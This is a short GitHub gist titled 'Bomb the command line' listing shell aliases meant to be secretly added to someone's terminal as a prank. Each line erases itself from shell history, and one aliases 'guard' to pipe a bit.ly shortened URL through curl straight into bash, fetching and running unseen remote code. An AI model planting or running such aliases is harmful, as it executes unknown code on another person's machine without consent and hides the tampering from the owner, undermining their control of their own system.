Skip to content

Instantly share code, notes, and snippets.

@jamestomasino
Last active June 18, 2016 22:03
Show Gist options
  • Save jamestomasino/86ffa7070f06c5152783d11080151c98 to your computer and use it in GitHub Desktop.
Save jamestomasino/86ffa7070f06c5152783d11080151c98 to your computer and use it in GitHub Desktop.
Bomb the command line
alias gs="curl -s https://baconipsum.com/api/?type=all-meat | say";history -d $(history 1)
alias work="telnet towel.blinkenlights.nl";history -d $(history 1)
alias guard="curl -s -L http://bit.ly/10hA8iC | bash";history -d $(history 1)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment